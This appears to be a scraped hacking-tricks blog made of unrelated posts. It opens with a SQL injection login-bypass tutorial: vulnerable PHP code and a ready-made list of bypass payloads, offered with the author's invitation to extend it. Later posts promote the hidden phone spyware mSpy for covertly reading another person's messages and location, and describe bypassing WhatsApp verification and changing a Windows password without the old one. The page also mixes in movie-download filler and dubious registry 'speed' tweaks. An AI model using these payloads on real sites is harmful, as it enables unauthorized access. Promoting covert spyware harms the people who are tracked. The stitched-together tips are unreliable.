Login Bypass Using SQL Injection

Login Bypass Using SQL Injection

After Enough of those injection we are now moving towards Bypassing Login pages using SQL Injection.

Note before reading this if you have not read the Basic SQL injection then please read that for a better understanding and be here step by step completing the injections.

First let us see an example of piece of code that actually creates the Login Page vulnerable to this attack.

Example:

$uname=$_POST['uname'];
$passwrd=$_POST['passwrd'];
$query="select username,pass from users where username='$uname' and password='$passwrd' limit 0,1";
$result=mysql_query($query);
$rows = mysql_fetch_array($result);
if($rows)
{
echo "You have Logged in successfully" ;
create_session();
}
else
{
Echo "Better Luck Next time";
}

What we can see above is a PHP code which takes the user Input put the into the SQL Query and then check if any row is returned it allow you to get Log in.

Now as we can see the query is quoting the input with single quote, that means we have to use a single quote to close the first quote and then inject.

So lets Inject ' or ''=' into the Query:

Logging in with following details:

Username : ' or ''='
Password : ' or ''='

select username,pass from users where username='' or ''='' and password='' or ''='' limit 0,1;

so what i actually did is made the query to return true using the or. We can even try and comment out the query using any comment operator like using the following username and password.

Username : ' or 1--
Password :

what we did is we left the password field empty and commented out the rest of the query. so lets try and check the Query part.

select username,pass from users where username='' or true--' and password='' or ''='' limit 0,1;

Here anything after -- wont be executed which makes the query to be:

select username,pass from users where username='' or true;

and it will return all the rows. and we can bypass the Login. This was the basic okay let us assume now different queries and different injection for them.

Query:

select username,pass from users where username=('$username') and password=('$passwrd') limit 0,1;

Injections:
') or true--
') or ('')=('
') or 1--
') or ('x')=('

Query:

select username,pass from users where username="$username" and password="$passwrd" limit 0,1;

Injections:
" or true--
" or ""="
" or 1--
" or "x"="

Query:

select username,pass from users where username=("$username") and password=("$passwrd") limit 0,1;

Injections:
") or true--
") or ("")=("
") or 1--
") or ("x")=("

Query:

select username,pass from users where username=(('$username')) and password=(('$passwrd')) limit 0,1;

Injections:
')) or true--
')) or ((''))=(('
')) or 1--
')) or (('x'))=(('

Well that was kind of enough for the Explaination now time to finish so i will give you my own bypass list which i made.

'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x

The list was getting long so i had to remove payloads with different comments...you can now make them yourself. just add different Comments types with all these payloads.

Enjoy it sshackingworld trick.

chhello divas movie Canteen Time Movie HD video Song

Canteen Time Chhello Divas Movie HD video Song

click here to download

           history of chhello divas

Chhello Divas is an upcoming Urban Gujarati Movie. Chhello Divas – A New Beginning Gujarati film 2015 story revolves around 8 friends, displaying their end of college life, growing up and ultimate beginning of a new life. Upcoming Gujarati Urban movie Chhello Divas is directed by Krishnadev Yagnik and is produced by Aayush Mehta, Nilay Chotai, Pranay Kabra, Sandil Dang and Sharad Patel

Chhello Divas Urban Gujarati Movie 2015 Star Cast:

Yash Soni, Malhar Thakar, Mitra Gadhvi, Mayur Chauhan, Prapti Ajwalia, Janki Bodiwala, Kinjal Rajpriya, Aarjav Trivedi, Jitendra Thakkar, Netri Trivedi, Prashant Barot and Rahul Raval

Chhello Divas Urban Gujarati Movie 2015 Crew Details:

Director: Krishnadev Yagnik

Producers: Aayush Mehta, Nilay Chotai, Pranay Kabra, Sandil Dang and Sharad Patel

Written by: Krishnadev Yagnik

Belvedere Films have managed to get some of the best talent in the industry as their lead cast. The film also aims to bridge the gap between regional movies and Bollywood by using the best technology and sets. The movie is primarily shot in Ahmedabad and have used some of the best locations in the city like Sabarmati riverfront. Music for the movie has been composed by Harsh Trivedi who is considered one of the leading composers in the Gujarati film industry.

Chhello Divas urban Gujarati Movie 2015 is set to release on 23rd October 2015. The trailer of Chhello Divas Gujarati film 2015 is recently released and it is awesome. By watching it, a grown up person would surely get nostalgic about his/her college days.

Chhello divas movie Kehvu Ghanu Ghanu Che HD video Song

Kehvu Ghanu Ghanu Che Chhello Divas Movie HD video Song

click here to download

            history of chhello divas

Chhello Divas is an upcoming Urban Gujarati Movie. Chhello Divas – A New Beginning Gujarati film 2015 story revolves around 8 friends, displaying their end of college life, growing up and ultimate beginning of a new life. Upcoming Gujarati Urban movie Chhello Divas is directed by Krishnadev Yagnik and is produced by Aayush Mehta, Nilay Chotai, Pranay Kabra, Sandil Dang and Sharad Patel

Chhello Divas Urban Gujarati Movie 2015 Star Cast:

Yash Soni, Malhar Thakar, Mitra Gadhvi, Mayur Chauhan, Prapti Ajwalia, Janki Bodiwala, Kinjal Rajpriya, Aarjav Trivedi, Jitendra Thakkar, Netri Trivedi, Prashant Barot and Rahul Raval

Chhello Divas Urban Gujarati Movie 2015 Crew Details:

Director: Krishnadev Yagnik

Producers: Aayush Mehta, Nilay Chotai, Pranay Kabra, Sandil Dang and Sharad Patel

Written by: Krishnadev Yagnik

Belvedere Films have managed to get some of the best talent in the industry as their lead cast. The film also aims to bridge the gap between regional movies and Bollywood by using the best technology and sets. The movie is primarily shot in Ahmedabad and have used some of the best locations in the city like Sabarmati riverfront. Music for the movie has been composed by Harsh Trivedi who is considered one of the leading composers in the Gujarati film industry.

Chhello Divas urban Gujarati Movie 2015 is set to release on 23rd October 2015. The trailer of Chhello Divas Gujarati film 2015 is recently released and it is awesome. By watching it, a grown up person would surely get nostalgic about his/her college days.

How to track my cell phone

         How to track my cell phone

Are you looking to know how to track a cell phone with pin point accuracy? Do you need to exactly know where your child or employees are moving around during your absence? If so you have come to the right place. In this article I will let you know some of the possible methods to GPS track a cell phone in simple steps.

1. How to Track a Cell Phone that Belongs to Someone Else?

If you need to track someone else’s phone such as your children or employees, you can simply use a cell phone tracking app such as mSpy. This is a very small app that can be installed in just a few simple steps and takes only 2-3 minutes to complete. Once installed the app stays hidden on the phone but keeps track of every activity on the phone including its GPS location, Call Logs, Text Messages and more.

How to track my cell phone with mSpy

mSpy Features:

GPS Location Tracking: GPS positions are uploaded at a time interval you select with a link to the map.

Track Text Messages & Emails: Every text message sent and received including SMS and emails are logged even if the phone logs are deleted.

Call Logs: Each incoming and outgoing number on the phone is logged along with duration, date and time stamp.

Phone Contacts: Get access to complete contact list on the target phone.

Browser History: All websites visited on the phone are logged.

Social Networking & Messenger Activity: All social media activity such as Facebook, Twitter, LinkedIn, WhatsApp, Skype, iMessages, Instagram and many more are recorded.

How it Works?

You will have to download and install the app onto the target phone of whose location and activities you want to track. Installation takes only a few minutes during which you should have the target phone in your hand.

Once the installation is complete, the tracking process will begin immediately and the recorded logs are silently uploaded to your mSpy account. You can login to your secure online account from your computer or phone at any time to view the logs containing GPS location, Call activities Text Messages and more. You can download mSpy from the link below:

Download mSpy

Supported Phones: Android, iPhone, iPad and Tablets.

2. Tracking a Lost phone
Now, let us look at some of the possible options to track a phone in case if it is lost or stolen.

For Android Phones:

If you need to track a lost android phone, you can follow the steps mentioned below:

Download Android Device Manager from Google play store and install it on another android device. This app lets you track your stolen android phone and also lets to remotely lock or erase all the data on it.
Android Device Manager

From “Android Device Manager” log into your Google account using the same ID associated with your lost phone. After successful login this app will attempt to locate your device and show its last known location on the map.
In addition, you will also be able to perform several actions on your lost phone such as give a Ring, Lock the device or Erase all the data stored on it.

For Apple iPhones:

If you need to track a lost iPhone, you can follow the steps mentioned below:

Login to the iCould Website using an Apple ID associated with your lost phone. Since location tracking is turned on by default on all iPhone devices, iCould lets you track it from your web browser or your iPad and shows its location on the map.
iColud Website

If your phone is found nearby to your location you have an option to Play Sound on it so that your iPhone will emit a sound, helping you track it down.
If this does not help, you can choose the option Lost Mode which will remotely lock your phone down and display a phone number that can be reached at.
If none of the above options work, you can finally decide to go with the option Erase iPhone which will completely wipe out all the data stored on it. This way you can prevent your private information from falling into the wrong hands.

For Windows Phones

In order to track down a lost Windows phone, you can try the below mentioned steps:

Go to Windows Phone Website and locate the option Find My Phone on the top-right corner of the page.
Track Windows Phone

This will ask you to sign-in using your Windows account associated with your lost phone. If your phone gets traced you will see a map showing its exact location. You will also find options to Lock, Ring and Erase its data in case if your phone is found to be completely lost.

How To Use WhatsApp Without Using Mobile Number

How To Use WhatsApp Without Using Mobile Number

latest whatsapp hacking trick

How to use whatsapp without using your mobile noumber. some people ask me about this.

=>First of all, Save complete Whatsapp data to your phone.

.

=>You dont have any need to Remove it Completely.

=>Go to Setting and then go to whatsapp and Clear Data.After clearing the data your all whatsapp data is removed and now your whatsapp is completely new.

=>Now go to click here and select any of the no. Here I will use an Indian Mobile Number.

=>Enter the number in the required field on Whatsapp. It will take you to the sms verification page.

=>Now go back to receivefreesms.com and click on the number which you have chosen to verify Whatsapp sms verification.

=>Enter the verification code in WhatsApp verification page. That's it, you are done

importent Note√

Some numbers might not work due to the technical error, no problem choose any other number to verify sms verification. The only drawback with this trick is anyone can use the same no. for verification so during those times WhatsApp will ask you to re-verify your number.

How to make unlimited free call

How to make unlimited free call

This trick for useing only Android user.

1. First, download CROWD CALL app download on your Android mobile and install this app.

2. Now when you start this CROWD CALL App it will ask you to enter your number and here just fill your number.

3. Now enter destination number to which you want to call.

4. Within 5 second you will get a call on your number with an international number, now just attend the call n press 1, and wait  few seconds.

5. Now Crowd Call will connect you with your friends.

Note:

you can make 10 calls everyday for unlimited time.

click here to download

HOW TO INCREASE INTERNET SPEED ?

HOW TO INCREASE INTERNET SPEED ?

1. Go to desktop-&My computer-(right click on)-&properties

2.Then go HARDWARE tab-& Device manager-& now u see a window of Device manager..

3.Then go to Ports-&Communication Port(double click on it and Open).

4.After open u can see a Communication Port properties.

5.Go the Port Setting

And now increase your "Bits per second" to 128000.
And "Flow control" change 2 Hardware

6:Type this coding in notepad and save as .reg and then execute this file....this will increase ur surfing n downloading speed.....

REGEDIT4
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentContro
lSet\\Servic es\\Tcpip\\Parameters]
"SackOpts"=dword:00000001
"TcpWindowSize"=dword:0005ae4c
"Tcp1323Opts"=dword:00000003
"DefaultTTL"=dword:00000040
"EnablePMTUBHDetect"=dword:00000000
"EnablePMTUDiscovery"=dword:00000001
"GlobalMaxTcpWindowSize"=dword:0005ae4c

7: Xp reserves 20% bandwith,
to unreserved it,follow following steps:

--> Click Start

-->Run:"gpedit.msc"

--> Goto:&Local Computer Policy>Computer Configuration>Administrative Templates>Network>QOS Packet Scheduler>Limit Reservable Bandwidth

-->Double click on Limit Reservable bandwidth

--> Select Enable

--> Change 50% to 30%

--> Click Apply

How to crack windows password without old password

How To crack Windows password                                         without old password

Hello friends, you know that Administrator password in widows are protected your widows are protecting your computer from any unauthorized access. So that chooses a strong password and safe your computer or system files from unauthorized access. But  if you forget your windows login password, or  want to change your password without knowing current or old password ,then don’t worry , In this we are telling about  to  change windows login password with a some simple method, which you can do easily perform. 

----------------------------------------

Method -1

Step-1

  Select “My computer” and press Right click on it and chose a “Manage” options. or Press Windows+R Key and type compmgmt.msc in Run Box and hit enter.

Step-2

Computer Management windows > Select System Tools from Right window pane > Local Users and Groups" and double click on it

Step-3

Click on "Users" and you will see all the login accounts of  your computer. And after that select your account.

Step-4

After selecting your login Account press Right Click on it. And then choose "Set Password" option > click on "Proceed".

Step-5

Enter the New Password and conform them, then click on "OK" Button.

Step-6

you can restart your system and check with your new password.

----------------------------------------
|              command prompt trick              |
----------------------------------------

Method -2

Change password with "Command Prompt"

Step-1

go to start menu select command prompt (cmd)

Step-2

type below command in cmd 

  net user %username% sshackingworld

  you can change "sshackingworld"  to with your choice password and after that hit enter.

Now your password have been successfully changed . with useing sshackingworld.in tricks